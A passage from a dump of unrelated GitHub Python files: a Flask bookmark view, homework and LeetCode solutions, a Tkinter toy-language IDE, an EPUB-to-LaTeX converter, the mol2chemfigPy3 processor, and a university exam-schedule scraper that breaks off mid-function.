_bookmark\n if bookmark is None:\n _bookmark = bcfg.get_value('folder.config')+'bookmark.yml'\n if os.path.exists(_bookmark):\n bookmark = _bookmark\n return Reply.Success(value=SYAML().load(bookmark))\n # return Reply.Fail(success=False, message='Fail Message Test')\n elif request.method == 'POST':\n content = request.get_json()\n if session and 'user_id' in session:\n bmfile = 'bookmark_userid_{uid:04d}.yml'\n _bookmark = bcfg.get_value('folder.bookmark')\n _bookmark += bmfile.format(uid=int(session['user_id']))\n with codecs.open(_bookmark, 'w', encoding='utf-8') as fd:\n fd.write(content['data'])\n msg = 'Stored to {}.'.format(os.path.basename(_bookmark))\n return Reply.Success(success=True, message=msg)\n return Reply.Fail(message='Need to log in.')\n","repo_name":"peanutstars/py-bill","sub_path":"src/web/view_index.py","file_name":"view_index.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30473829533","text":"\r\n# Netanel Farhi .\r\n# ID 318590890\r\n\r\n### Answer Q1\r\n\r\ndef my_func(x1,x2,x3):\r\n list_parameters=[x1,x2,x3]\r\n if any(isinstance(x, (list, str)) for x in list_parameters):\r\n return None\r\n elif not all(isinstance(x, float) for x in list_parameters):\r\n print( \"parameters should be float\")\r\n # If the parameters have been inserted correctly :\r\n else:\r\n nominator = (x1 + x2 + x3) * (x2 + x3) * x3\r\n denominator = x1 + x2 + x3\r\n if denominator != 0:\r\n result = float(nominator / denominator)\r\n return result\r\n if denominator == 0:\r\n print(\"Not a number - denominator equals zero\")\r\n#answer=my_func(1,-0.5,-0.5)\r\n#print(answer)\r\n\r\n# Answer Q2\r\ndef revword(word:str)->str:\r\n return word[::-1].lower()\r\n#print(revword(\"tsriF\"))\r\ndef countword()->int:\r\n corrected_content=\"\"\r\n file = open('text.txt', 'r')\r\n lines = file.read().splitlines()\r\n word = lines[0].lower()\r\n text = lines[1:]\r\n for i in range(0,len(text)):\r\n splitted_row=text[i].split()\r\n for j in splitted_row:\r\n corrected_content=corrected_content+str(revword(j))+\" \"\r\n corrected_content=corrected_content+\"\\n\"\r\n corrected_content=corrected_content.split()\r\n count=corrected_content.count(word)+1\r\n return count\r\n\r\n#print(countword())\r\n\r\n\r\n\r\n","repo_name":"NetanelFarhi/Data-Mining","sub_path":"Matala1_318590890.py","file_name":"Matala1_318590890.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15778784461","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def removeElements(self, head: ListNode, val: int) -> ListNode:\n curr=head\n if head is None:\n return head\n while curr.next:\n if curr.next.val==val:\n curr.next=curr.next.next\n else:\n curr=curr.next\n if head.val==val:\n head=head.next\n return head\n","repo_name":"okorokovnikita/leetcode","sub_path":"top interview questions/remove_linked_list_elements.py","file_name":"remove_linked_list_elements.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41917312802","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nimport ñ\nimport sys\nimport string\n\nDigitos = '0123456789'\nLetras = string.ascii_letters\n\nENT = 'ENT'\nREAL = 'REAL'\nCADENA = 'CADENA'\nPALCL='PALCL' #Keyword\nID = 'ID' #Identificador\nMAS = 'MAS'\nMENOS = 'MENOS'\nMULT = 'MULT'\nDIV = 'DIV'\nPOT = 'POT'\nIG = 'IG' #Igual \nPARENIZQ = 'PARENIZQ'\nPARENDER = 'PARENDER'\nCORCHIZQ = 'CORCHIZQ'\nCORCHDER = 'CORCHDER'\nII = 'II'\nNI = 'NI'\nMEQ = 'MEQ'\nMAQ = 'MAQ'\nMEI = 'MEI'\nMAI = 'MAI'\nCOMA = 'COMA'\nFLECHA = 'FLECHA'\nNUEVALINEA = 'NUEVALINEA'\nFDC = 'FDC' \nFINALARCHIVO = 'EOF'\n\nRESERVADAS = [\n 'VAR',\n 'Y',\n 'O',\n 'NO',\n 'SI',\n 'ENTONCES',\n 'SINOESTO',\n 'SINO',\n 'POR',\n 'A',\n 'PASO',\n 'MIENTRAS',\n 'FUN',\n 'FIN',\n 'RETORNAR',\n 'CONTINUAR',\n 'ROMPER'\n]\n\n\n\n\n\nclass Logger():\n stdout = sys.stdout\n mensajes = []\n\n def inicio(self):\n sys.stdout = self\n \n def fin(self):\n sys.stdout = self.stdout\n\n def write(self, text):\n self.mensajes.append(text)\n\nlog = Logger()\n\n\nventana = Tk()\nventana.title('IDE proyecto final Compiladores')\n\nrutaGuardado = ''\n\ndef correrCodigo():\n global rutaGuardado\n resultado.delete('1.0',END)\n if rutaGuardado == '':\n msgGuardar = Toplevel()\n msg = Label(msgGuardar, text=\"Porfavor guarde el archivo primero\")\n msg.pack()\n return\n global log\n log.inicio()\n log.mensajes.clear()\n codigo = editorTexto.get('1.0',END)\n res, error = ñ.exe('IDE',codigo)\n if error: resultado.insert('1.0',error.como_str())\n elif res: \n if len(res.elementos) == 1:\n resultado.insert('1.0',repr(log.mensajes[0]))\n else:\n str1 = \"\"\n resultado.insert('1.0',str1.join(log.mensajes))\n log.fin()\n\ndef abrirArchivo():\n ruta = askopenfilename(filetypes=[('Archivos de Texto','*.txt')])\n with open(ruta, 'r') as archivo:\n codigo = archivo.read()\n editorTexto.delete('1.0',END)\n editorTexto.insert('1.0', codigo)\n global rutaGuardado\n rutaGuardado = ruta\n\ndef guardarComo():\n global rutaGuardado\n if rutaGuardado == '':\n ruta = asksaveasfilename(filetypes=[('Archivos de Texto','*.txt')])\n else:\n ruta = rutaGuardado\n with open(ruta, 'w') as archivo:\n codigo = editorTexto.get('1.0', END)\n archivo.write(codigo)\n\n\ndef colorear():\n tag_cont = 0\n for tag in editorTexto.tag_names():\n editorTexto.tag_delete(tag)\n codigo = editorTexto.get('1.0',END)\n lexer = ñ.Lexer('IDE',codigo)\n tokens, error = lexer.crear_token()\n if error:\n #print(\"ERROR\")\n editorTexto.tag_add(\"error\", f\"{error.pos_start.ln}.{error.pos_start.col}\",f\"{error.pos_end.ln}.{error.pos_end.col}\")\n editorTexto.tag_configure(\"error\",foreground=\"red\")\n editorTexto.update()\n else:\n for t in tokens:\n if t.type == PALCL:\n #print(f\"a: {t.pos_start.ln}.{t.pos_start.col} | {t.pos_end.ln}.{t.pos_end.col}\")\n nom_tag = \"tag\" + str(tag_cont)\n editorTexto.tag_add(nom_tag, f\"{t.pos_start.ln + 1}.{t.pos_start.col}\",f\"{t.pos_end.ln + 1}.{t.pos_end.col}\")\n editorTexto.tag_configure(nom_tag, foreground=\"pink\")\n \n elif t.type== CADENA:\n #print(f\"b: {t.pos_start.ln}.{t.pos_start.col} | {t.pos_end.ln}.{t.pos_end.col}\")\n nom_tag = \"tag\" + str(tag_cont)\n editorTexto.tag_add(nom_tag, f\"{t.pos_start.ln + 1}.{t.pos_start.col}\",f\"{t.pos_end.ln + 1}.{t.pos_end.col}\")\n editorTexto.tag_configure(nom_tag, foreground=\"salmon\")\n elif t.type == ENT or t.type == REAL:\n #print(f\"c: {t.pos_start.ln}.{t.pos_start.col} | {t.pos_end.ln}.{t.pos_end.col}\")\n nom_tag = \"tag\" + str(tag_cont)\n editorTexto.tag_add(nom_tag, f\"{t.pos_start.ln}.{t.pos_start.col}\",f\"{t.pos_end.ln + 1}.{t.pos_end.col}\")\n editorTexto.tag_configure(nom_tag, foreground=\"yellow\")\n elif t.type == ID:\n #print(f\"d: {t.pos_start.ln}.{t.pos_start.col} | {t.pos_end.ln}.{t.pos_end.col}\")\n nom_tag = \"tag\" + str(tag_cont)\n editorTexto.tag_add(nom_tag, f\"{t.pos_start.ln + 1}.{t.pos_start.col}\",f\"{t.pos_end.ln + 1}.{t.pos_end.col}\")\n editorTexto.tag_configure(nom_tag, foreground=\"cyan\")\n editorTexto.update()\n tag_cont += 1\n\n\neditorTexto = Text()\neditorTexto.config(bg='#362f2e', fg='#d2ded1', insertbackground='white')\neditorTexto.pack()\n\nresultado = Text(height=7)\nresultado.config(bg='#362f2e', fg='#1dd604')\nresultado.pack()\n\nbarraMenu = Menu(ventana)\n\nbarraArchivo = Menu(barraMenu, tearoff=0)\nbarraArchivo.add_command(label='Abrir', command=abrirArchivo)\nbarraArchivo.add_command(label='Guardar', command=guardarComo)\nbarraArchivo.add_command(label='Guardar como', command=guardarComo)\nbarraArchivo.add_command(label='Salir', command=exit)\nbarraMenu.add_cascade(label='Archivo', menu=barraArchivo)\n\nbarraCorrer = Menu(barraMenu, tearoff=0)\nbarraCorrer.add_command(label='Correr', command=correrCodigo)\nbarraCorrer.add_command(label='Analizar', command=colorear)\nbarraMenu.add_cascade(label='Correr', menu=barraCorrer)\n\n\nventana.config(menu=barraMenu)\nventana.mainloop()","repo_name":"elian2310/LenguajeCompiladores","sub_path":"ideProj.py","file_name":"ideProj.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17987852735","text":"#!/usr/bin/env python\n\nimport hid\n\nclass dna75:\n _vendorId = 0x268b\n _productId = 0x0408\n\n def __init__(self):\n self._connect()\n\n def _connect(self):\n self.h = hid.device()\n self.h.open(self._vendorId, self._productId)\n self.h.set_nonblocking(1)\n\n print('Connecting %s [%s] (%s)' % (\n self.h.get_product_string(),\n self.h.get_manufacturer_string(),\n self.h.get_serial_number_string()))\n\n def disconnect(self):\n self.h.close()\n\nclass helix:\n def __init__(self):\n try:\n dna = dna75()\n dna.disconnect()\n except OSError:\n print('there is no dna chip available')\n\nif __name__ == '__main__':\n helix()\n","repo_name":"esno/helix","sub_path":"src/helix.py","file_name":"helix.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"24192690202","text":"#Python modules\r\nimport re\r\nimport os\r\nimport logging\r\nfrom bs4 import BeautifulSoup, Comment\r\nfrom datetime import datetime\r\n#files for this program\r\nimport regex_codes\r\nimport opf_templates as templates\r\nfrom format_strings import filter_chars01, filter_chars02\r\n\r\n\r\ndef get_head_file(fandom, size, logger):\r\n\tresult = templates.geometry\r\n\tif size == 'letter':\r\n\t\tresult += templates.geometry_lettersize\r\n\telse:\r\n\t\tresult += templates.geometry_tradesize\r\n\tresult += templates.geometry_margins\r\n\t\r\n\tresult += templates.symbols\r\n\t\r\n\tresult += templates.font\r\n\tif(fandom):\r\n\t\tif(re.search(\"The 100\", fandom)):\r\n\t\t\tresult += templates.fonts_hundred\r\n\t\telif(re.search(\"Danny Phantom\", fandom)):\r\n\t\t\tresult += templates.fonts_dp\r\n\t\telif(re.search(\"Harry Potter\", fandom)):\r\n\t\t\tresult += templates.fonts_hp\r\n\t\telif(re.search(\"Heathers\", fandom)):\r\n\t\t\tresult += templates.fonts_heathers\r\n\t\telif(re.search(\"Kim Possible\", fandom)):\r\n\t\t\tresult += templates.fonts_kp\r\n\t\telif(re.search(\"Star Wars\", fandom)):\r\n\t\t\tresult += templates.fonts_sw\r\n\t\telif(re.search(\"Twilight\", fandom)):\r\n\t\t\tresult += templates.fonts_twilight\r\n\t\telif(re.search(\"Wizard of Oz\", fandom, re.IGNORECASE) or re.search(\"\\bWicked\\b\", fandom)):\r\n\t\t\tresult += templates.fonts_oz\r\n\t\telif(re.search(\"Wynonna Earp\", fandom)):\r\n\t\t\tresult += templates.fonts_we\r\n\t\r\n\tresult += templates.titles\r\n\tif(fandom):\r\n\t\tif(re.search(\"Harry Potter\", fandom)):\r\n\t\t\tresult += templates.commands_hp\r\n\tresult += templates.misc\r\n\t\r\n\tresult += templates.toc\r\n\t\r\n\tresult += templates.images\r\n\t\r\n\tresult += templates.underline\r\n\t\r\n\tresult += templates.drop_caps\r\n\t\r\n\tresult += templates.blockquotes\r\n\t\r\n\tresult += templates.commands\r\n\t\r\n\treturn result\r\n\r\n\r\ndef handle_date_tag(tag, logger):\r\n\trelevant = True\r\n\tif(len(tag.attrs) > 0):\r\n\t\tif('opf:event' in tag.attrs):\r\n\t\t\tif(tag['opf:event'] == 'creation'):\r\n\t\t\t\trelevant = False\r\n\t\t\telif(tag['opf:event'] == 'modification'):\r\n\t\t\t\trelevant = False\r\n\tif relevant:\r\n\t\ttry:\r\n\t\t\ttag_date = datetime.strptime(tag.string.strip().replace(\"+00:00\", ''), \"%Y-%m-%dT%H:%M:%S\")\r\n\t\t\ttag.string.replace_with(tag_date.strftime(\"%Y-%m-%d\"))\r\n\t\texcept ValueError:\r\n\t\t\ttry: \r\n\t\t\t\ttag_date = datetime.strptime(tag.string.strip(), \"%Y-%m-%d\")\r\n\t\t\t\ttag.string.replace_with(tag_date.strftime(\"%Y-%m-%d\"))\r\n\t\t\texcept ValueError:\r\n\t\t\t\ttag.string.replace_with(tag.string.strip())\r\n\t\ttag.insert_before(\"\\n\" + \"\\\\date{\")\r\n\t\ttag.insert_after(\"}\" + \"\\n\")\r\n\t\ttag.unwrap()\r\n\telse:\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\treturn\r\n\r\ndef handle_creator_tag(tag, logger):\r\n\ttag.string.replace_with(tag.string.strip())\r\n\tfound_author = False\r\n\tif(len(tag.attrs) > 0):\r\n\t\tfor attr in tag.attrs:\r\n\t\t\tif re.match(r\"(opf:|ns\\d:|)role\", attr):\r\n\t\t\t\tif tag[attr] == 'aut':\r\n\t\t\t\t\t# print(\"\\\\author{%s}\" % (tag.string))\r\n\t\t\t\t\ttag.insert_before(\"\\n\" + \"\\\\author{\")\r\n\t\t\t\t\ttag.insert_after(\"}\" + \"\\n\")\r\n\t\t\t\t\ttag.unwrap()\r\n\t\t\t\t\tfound_author = True\r\n\tif not found_author:\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\treturn\r\n\r\ndef handle_title_tag(tag, logger):\r\n\ttitle_string = tag.string.strip()\r\n\ttitle = tag.string.strip()\r\n\t# title_string = re.sub(r\"&(amp;|)\", r\"\\\\&\", title_string)\r\n\ttag.string.replace_with(title_string)\r\n\ttitle = re.sub(r\"[^A-z0-9 ]+\", r\"_\", title)\r\n\ttitle = re.sub(r\"[_]*([ ]+)[_]*\", r\" \", title)\r\n\ttitle = re.sub(r\"[ ]{2,}\", r\" \", title)\r\n\ttag.insert_before(\"\\n\" + \"\\\\title{\")\r\n\ttag.insert_after(\"}\" + \"\\n\")\r\n\ttag.unwrap()\r\n\treturn title\r\n\r\ndef handle_source_tag(tag, logger):\r\n\ttag.string.replace_with(tag.string.strip())\r\n\ttag.insert_before(\"\\n\" + \"\\\\date{\\\\texttt{\")\r\n\ttag.insert_after(\"}}\" + \"\\n\")\r\n\ttag.unwrap()\r\n\treturn\r\n\r\ndef handle_manifest_tag(tag, multichapter, logger):\r\n\tif(multichapter):\r\n\t\ttag.insert_before(templates.begin_multi)\r\n\telse:\r\n\t\ttag.insert_before(templates.begin_single)\r\n\ttag.insert_after(\"\\n\" + \"\\\\end{document}\" + \"\\n\")\r\n\ttag.unwrap()\r\n\treturn\r\n\r\ndef handle_item_tag(tag, logger):\r\n\tif(re.search(r\"title[_]?page\", tag['id'])):\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\telif('media-type' in tag.attrs):\r\n\t\tif(re.match(\"application/x?html?\", tag['media-type'])):\r\n\t\t\tpre, ext = os.path.splitext(tag['href'])\r\n\t\t\ttag.replace_with(\"\\n\" + \"\\\\include{\" + pre + \"}\" + \"\\n\")\r\n\t\telse:\r\n\t\t\ttag.replace_with(\"\\n\\n\")\r\n\telse:\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\treturn\r\n\r\n\r\ndef format_opf(read, multichapter, fandom, logger):\r\n\tsoup = BeautifulSoup(read, 'lxml')\r\n\ttitle = None\r\n\t#Remove comments\r\n\tfor comment in soup.find_all(string=lambda text:isinstance(text, Comment)):\r\n\t\tcomment.extract()\r\n\t\r\n\t\r\n\tfor tag in soup.find_all(templates.unwrap_tags):\r\n\t\ttag.insert_before(\"\\n\\n\")\r\n\t\ttag.insert_after(\"\\n\\n\")\r\n\t\ttag.unwrap()\r\n\tfor tag in soup.find_all(templates.package_tags):\r\n\t\ttag.insert_before(\"\\n\\n\" + \"\\\\input{head}\" + \"\\n\\n\")\r\n\t\ttag.unwrap()\r\n\tfor tag in soup.find_all(templates.title_tags):\r\n\t\ttitle = handle_title_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.source_tags):\r\n\t\thandle_source_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.manifest_tags):\r\n\t\thandle_manifest_tag(tag, multichapter, logger)\r\n\tfor tag in soup.find_all(templates.item_tags):\r\n\t\thandle_item_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.date_tags):\r\n\t\thandle_date_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.creator_tags):\r\n\t\thandle_creator_tag(tag, logger)\r\n\tfor tag in soup.find_all(templates.remove_tags):\r\n\t\ttag.replace_with(\"\\n\\n\")\r\n\tfor tag in soup.find_all(True):\r\n\t\ttag.insert_before(\"\\n\")\r\n\t\ttag.insert_after(\"\\n\")\r\n\t\tlogger.warning(\"\\t\\t\\t\" + tag.name)\r\n\t\r\n\tread = str(soup)\r\n\tread = re.sub(r\"<\\?xml[^>]*\\?>[\\r\\n]*\", templates.doc_dec_12, read)\r\n\t\r\n\twhile(re.search(templates.title_underscore, read)):\r\n\t\tread = re.sub(templates.title_underscore, r\"\\\\\\1{\\2\\_\\3}\", read)\r\n\t\r\n\tread = re.sub(\"([&#$])\", r\"\\\\\\1\", read)\r\n\tread = re.sub(\"(&)amp;\", r\"\\1\", read, flags=re.IGNORECASE)\r\n\t\r\n\tread = re.sub(r\"[ \\t\\r]+\\n\", r\"\\n\", read)\r\n\tread = re.sub(r\"\\n{3,}\", r\"\\n\\n\", read)\r\n\t\r\n\tread = re.sub(r\"(\\A)\\n+\", r\"\\1\", read)\r\n\tread = re.sub(r\"[ \\t\\r\\n]+(\\n\\Z)\", r\"\\1\", read)\r\n\r\n\treturn read, title\r\n\r\n","repo_name":"LifeShouldBeAMusical/epub-soup-to-latex","sub_path":"format_opf.py","file_name":"format_opf.py","file_ext":"py","file_size_in_byte":5953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12618464951","text":"# -*- coding: utf-8 -*-\n\"\"\"\naccept input from command line or through the web and\nreturn the result.\n\"\"\"\nimport os.path\nimport traceback\nfrom urllib import request\nfrom typing import Union, List, Tuple\nfrom indigo import Indigo, IndigoException, IndigoObject\nfrom . import common, options, molecule\n\n\nclass HelpError(common.MCFError):\n def __init__(self, text: any):\n self.text = str(text) # convert error messages to string\n\n def __str__(self):\n return self.text\n\n\nclass Processor:\n \"\"\"\n parses input and invokes backend, returns result\n \"\"\"\n\n def __init__(\n self,\n raw_args: Union[List, str, None],\n data: str,\n form_fields: any,\n program_name: str,\n web_form: bool,\n rpc: bool,\n ):\n self.raw_args = raw_args\n self.data = data\n self.form_fields = form_fields\n\n # if the user renames the script file or the\n # web client, use their new names\n self.program_name = os.path.split(program_name)[-1]\n\n # flags that indicate origin of input\n self.web_form = web_form\n self.rpc = rpc\n\n self.option_parser = options.getParser()\n self.options = dict(common.settings)\n\n # data obtained from the proper source go here\n self.data_string = None\n\n def version_text(self) -> str:\n \"\"\"\n print the program version\n\n :return: version text\n \"\"\"\n return common.version_text(program_name=self.program_name)\n\n def help_text(self) -> str:\n \"\"\"\n error messages for the command line interface.\n\n :return: help text\n \"\"\"\n return common.help_text(program_name=self.program_name)\n\n def parseInputCli(self) -> None:\n \"\"\"\n parse input that came through the command line (locally or rpc)\n return success flag and either error message or data\n\n :return: None\n \"\"\"\n # catch empty input\n if not self.raw_args and not self.data:\n ht = self.help_text()\n\n raise HelpError(ht)\n\n # parse options and arguments\n try:\n parsed_options, data_list = self.option_parser.process_cli(self.raw_args)\n except Exception as msg:\n if str(msg).endswith(\"not recognized\"): # get opt error\n msg = f\"{str(msg)}. Try {self.program_name} --help to see a list of available options.\"\n raise HelpError(msg)\n\n # if we get here, we have parsed options and a possibly empty data list\n self.options.update(parsed_options)\n\n # before we go on to check on the data, we will satisfy help requests,\n # which we treat like an error\n if self.options[\"help\"]:\n raise HelpError(self.help_text())\n elif self.options[\"version\"]:\n raise HelpError(self.version_text())\n\n if self.data is not None:\n data_list.append(self.data)\n\n # at this point, we should have reached the same state\n # by rpc and local invocation\n\n if len(data_list) != 1:\n if not data_list:\n raise common.MCFError(\"No input data supplied\")\n raise common.MCFError(\"Please give only one file or data string as input\")\n\n data = data_list[0]\n\n if not self.rpc and self.options[\"input\"] == \"file\":\n try:\n with open(data, mode=\"r\", encoding=\"utf-8\") as fh:\n data = fh.read()\n except IOError:\n raise common.MCFError(f\"Can't read file {data}\")\n\n self.data_string = data\n\n def parseInputWeb(self) -> None:\n \"\"\"\n parse options and provide data provided through the web form\n\n :return: None\n \"\"\"\n parsed_options, warnings = self.option_parser.process_form_fields(\n self.form_fields\n )\n\n if warnings:\n raise common.MCFError(\"
\\n\".join(warnings))\n\n # no warnings ...\n self.options.update(parsed_options)\n self.data_string = self.data\n\n def process(self) -> molecule.Molecule:\n \"\"\"\n process input from both web form and CLI\n\n :return: a molecule\n \"\"\"\n if not self.web_form:\n self.parseInputCli()\n else:\n self.parseInputWeb()\n # let toolkit parse the molecule, and process it\n tk_mol = self.parseMolecule()\n\n # we now know how to deal with orphan atoms.\n # atoms, bonds = tkmol.countAtoms(), tkmol.countBonds()\n # if atoms <= 1 or bonds == 0:\n # raise common.MCFError, \"Input contains no bonds---can't render structure\"\n\n mol = molecule.Molecule(self.options, tk_mol)\n\n return mol\n\n def parseMolecule(self) -> IndigoObject:\n \"\"\"\n turn the input into a toolkit molecule according to user settings\n\n indigo is supposed to read transparently, so we can do away with\n the format setting, basically. If it's numeric, we ask pubchem;\n if it isn't, we consider it a molecule.\n\n :return: IndigoObject\n \"\"\"\n raw_input = self.data_string\n\n try:\n pubchem_id = int(raw_input)\n except ValueError:\n pubchem_id = None\n\n if pubchem_id is not None:\n try:\n url = common.pubchem_url % pubchem_id\n pubchem_content = request.urlopen(url).read()\n except IOError:\n raise common.MCFError(\"No connection to PubChem\")\n\n self.data_string = pubchem_content.decode()\n\n try:\n tkmol = Indigo().loadMolecule(self.data_string)\n except IndigoException:\n raise common.MCFError(\"Invalid input data\")\n\n hydrogens = self.options[\"hydrogens\"]\n\n if hydrogens == \"add\":\n tkmol.unfoldHydrogens()\n tkmol.layout() # needed to give coordinates to added Hs\n\n elif hydrogens == \"delete\":\n tkmol.foldHydrogens()\n\n if not tkmol.hasCoord() or self.options[\"recalculate_coordinates\"]:\n tkmol.layout()\n\n return tkmol\n\n\ndef process(\n raw_args: Union[List, str, None] = None,\n data: any = None,\n form_fields: any = None,\n program_name: str = \"mol2chemfigPy3\",\n web_form: bool = False,\n rpc: bool = False,\n inline: bool = False,\n) -> Tuple[bool, Union[str, molecule.Molecule]]:\n \"\"\"\n process is a convenience wrapper for external callers\n\n :param raw_args: arguments\n :param data: data\n :param form_fields: form fields\n :param program_name: program name\n :param web_form: whether is web form\n :param rpc: rpc\n :param inline: inline mode: if true return the raw result else the decorated result\n :return: (bool, molecule)\n \"\"\"\n p = Processor(raw_args, data, form_fields, program_name, web_form, rpc)\n\n try:\n mol = p.process()\n\n except HelpError as msg:\n return False, str(msg)\n\n except common.MCFError: # anticipated error - brief message enough\n msg = traceback.format_exc().splitlines()[-1]\n msg = msg.split(\": \")[-1]\n return False, msg if inline else f\"\\033[0;31m{msg}\\033[0m\"\n\n except Exception: # unexpected error - get full traceback\n tb = traceback.format_exc()\n return False, tb\n\n return True, mol\n","repo_name":"Augus1999/mol2chemfigPy3","sub_path":"mol2chemfigPy3/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"} +{"seq_id":"18228941366","text":"import time\nfrom lxml import html\netree = html.etree\nimport requests\nimport importlib, sys\nfrom util import identifyRandcode\nfrom db.model import t_unsuccessful_list, t_es_exam\nimport re\nimport pandas as pd\nimport os\nfrom bs4 import BeautifulSoup\n\n\nclass student():\n studentName = ''\n header = {'User-Agent': 'Mozilla/5.0',\n 'Accept-Encoding': 'gzip,deflate',\n 'Connection': 'keep-alive',\n 'Referer': 'http://es.bnuz.edu.cn/default2.aspx'\n }\n s = requests.session()\n\n def __init__(self, studentNumber, password):\n self.studentNumber = studentNumber\n self.password = password\n\n def getCheckCodeImage(self):\n importlib.reload(sys)\n imgUrl = \"http://es.bnuz.edu.cn/CheckCode.aspx\"\n imgresponse = self.s.get(imgUrl, headers=self.header)\n image = imgresponse.content\n imgresponse.close()\n DstDir = os.getcwd() + \"\\\\\"\n try:\n with open(\"image/original_img.jpg\", \"wb\") as jpg:\n jpg.write(image)\n except IOError:\n print(\"IO Error\\n\")\n finally:\n jpg.close\n\n def login(self, checkCode):\n url = \"http://es.bnuz.edu.cn/default2.aspx\"\n response = self.s.get(url, headers=self.header)\n selector = etree.HTML(response.content)\n __VIEWSTATE = selector.xpath('/html/body/form[@id=\"form1\"]/div/input/@value')[2]\n __VIEWSTATEGENERATOR = selector.xpath('/html/body/form[@id=\"form1\"]/div/input/@value')[3]\n __PREVIOUSPAGE = selector.xpath('/html/body/form[@id=\"form1\"]/div/input/@value')[4]\n __EVENTVALIDATION = selector.xpath('/html/body/form[@id=\"form1\"]/div/input/@value')[5]\n RadioButtonList1 = u\"学生\".encode('gb2312', 'replace')\n data = {\n \"__EVENTTARGET\": \"\",\n \"__EVENTARGUMENT\": \"\",\n \"__VIEWSTATE\": __VIEWSTATE,\n \"__VIEWSTATEGENERATOR\": __VIEWSTATEGENERATOR,\n \"__PREVIOUSPAGE\": __PREVIOUSPAGE,\n \"__EVENTVALIDATION\": __EVENTVALIDATION,\n \"TextBox1\": self.studentNumber,\n \"TextBox2\": self.password,\n \"TextBox3\": checkCode,\n \"RadioButtonList1\": RadioButtonList1,\n \"Button4_test\": \"\",\n }\n response = self.s.post(url, data=data, headers=self.header)\n content = response.content.decode('utf-8')\n selector = etree.HTML(content)\n infor = selector.xpath('//*[@id=\"xhxm\"]/text()')[0]\n text = infor\n text = text.replace(\" \", \"\")\n studentnumber = text[:10]\n studentname = text[10:].replace(\"同学\", \"\")\n print(\"studentname:\" + studentname)\n self.studentName = studentname\n print(\"studentnumber:\" + studentnumber)\n\n def login_out(self):\n url = \"http://es.bnuz.edu.cn/xs_main.aspx?xh=\" + self.studentNumber\n headers = {\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36\"\n }\n index = self.s.get(url, headers=headers)\n soup = BeautifulSoup(index.content, 'html5lib')\n __VIEWSTATE = soup.find('input', id='__VIEWSTATE')['value']\n __VIEWSTATEGENERATOR = soup.find('input', id='__VIEWSTATEGENERATOR')['value']\n __EVENTVALIDATION = soup.find('input', id='__EVENTVALIDATION')['value']\n data = {\n \"__EVENTTARGET\": \"aTc2\",\n \"__EVENTARGUMENT\": \"\",\n \"__VIEWSTATE\": __VIEWSTATE,\n \"__VIEWSTATEGENERATOR\": __VIEWSTATEGENERATOR,\n \"__EVENTVALIDATION\": __EVENTVALIDATION,\n }\n response = self.s.post(url, data=data, headers=headers)\n print(str(self.studentNumber) + \" - \" + str(self.studentName) + \",login out ssuccessfull\")\n\n def getExam(self, studentNumber):\n exam_url = \"http://es.bnuz.edu.cn/jwgl/xskscx.aspx?xh=\" + str(self.studentNumber) + \"&xm=\" + str(\n self.studentName) + \"&gnmkdm=N121604\"\n refer = \"http://es.bnuz.edu.cn/jwgl/xs_main.aspx?xh=\" + str(self.studentNumber)\n header = {\n 'Referer': refer,\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; WOW64) \"\n \"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36\",\n 'Connection': 'keep-alive',\n 'Accept-Encoding': 'gzip,deflate'\n }\n response = self.s.get(exam_url, headers=header)\n soup = BeautifulSoup(response.content, \"lxml\")\n pre = soup.find(id=\"__VIEWSTATE\")\n __VIEWSTATE = (re.findall(r'value=\"(.*)\"', str(pre)))[0]\n ddl_xn_pre = soup.find(id=\"ccd_xn_ClientState\")\n ddl_xn = (re.findall(r'value=\"(.*)\"', str(ddl_xn_pre)))[0]\n ddl_xq_pre = soup.find(id=\"ccd_xq_ClientState\")\n ddl_xq = (re.findall(r'value=\"(.*)\"', str(ddl_xq_pre)))[0]\n formdata = {\n \"ScriptManager1\": \"ScriptManager1|bt_kscx\",\n \"__VIEWSTATEENCRYPTED\": \"\",\n \"__ASYNCPOST\": \"true\",\n \"bt_kscx\": \"考试查询\",\n \"__VIEWSTATE\": __VIEWSTATE,\n \"ccd_xn_ClientState\": str(ddl_xn + \":::\" + ddl_xn),\n \"ccd_xq_ClientState\": str(ddl_xq + \":::\" + ddl_xq),\n \"ddl_xn\": ddl_xn,\n \"ddl_xq\": ddl_xq,\n }\n headers = {\n \"Referer\": refer,\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36\",\n }\n response = self.s.post(exam_url, headers=headers, data=formdata)\n content = response.content.decode('utf-8')\n soup = BeautifulSoup(content, \"lxml\")\n examTimeOrCourseTime_list = []\n classroom_list = []\n try:\n 